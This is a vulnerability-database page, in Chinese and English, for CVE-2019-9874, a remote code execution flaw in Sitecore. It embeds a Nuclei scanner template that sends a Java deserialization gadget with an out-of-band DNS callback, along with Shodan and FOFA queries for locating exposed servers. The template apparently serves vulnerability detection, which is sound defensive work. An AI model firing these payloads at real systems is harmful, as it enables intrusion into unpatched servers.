CVE-2019-9874: Sitecore Experience Platform - Deserialization of Untrusted Data

日期: 2025-08-01 | 影响软件: Sitecore Experience Platform | POC: 已公开

漏洞描述

Sitecore Experience Platform before 8.2 Update-7 and 9.0 before Update-2 is vulnerable to a remote code execution vulnerability (CVE-2019-9874). An attacker can exploit this issue to execute arbitrary code on the affected system via a crafted request to the /sitecore/shell/Applications/Layouts/IDE.aspx endpoint.

PoC代码[已公开]

id: CVE-2019-9874

info:
  name: Sitecore Experience Platform - Deserialization of Untrusted Data
  author: ritikchaddha
  severity: critical
  description: |
    Sitecore Experience Platform before 8.2 Update-7 and 9.0 before Update-2 is vulnerable to a remote code execution vulnerability (CVE-2019-9874). An attacker can exploit this issue to execute arbitrary code on the affected system via a crafted request to the /sitecore/shell/Applications/Layouts/IDE.aspx endpoint.
  reference:
    - https://www.synacktiv.com/ressources/advisories/Sitecore_CSRF_deserialize_RCE.pdf
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9874
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-9874
    epss-score: 0.78933
    epss-percentile: 0.99005
    cwe-id: CWE-502
    cpe: cpe:2.3:a:sitecore:experience_platform:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sitecore
    product: experience_platform
    shodan-query: http.html:"SitecoSitecore Experience Platform"
    fofa-query: body="Sitecore Experience Platform"
  tags: cve,cve2019,sitecore,deserialization,rce,kev,vkev,vuln

http:
  - raw:
      - |
        POST /sitecore/shell/Applications/Security/CreateNewUser/CreateNewUser.aspx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: __CSRFCOOKIE={{randstr}};

        __CSRFTOKEN={{generate_java_gadget("dns", "https://{{interactsh-url}}", "base64")}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PotentialCsrfException"
          - "deserialization"
        condition: and
        case-insensitive: true

      - type: status
        status:
          - 500
# digest: 4a0a00473045022046eb26151000e5db095ce5ea780f1093e8a137a16b47dfa3492cc1dbb39a8a14022100d98a969c14c1c54fde27f1a8963c2d00cfebb39988397dc48f3e9ed819844438:922c64590222798bb761d5b6d8e72950

相关漏洞推荐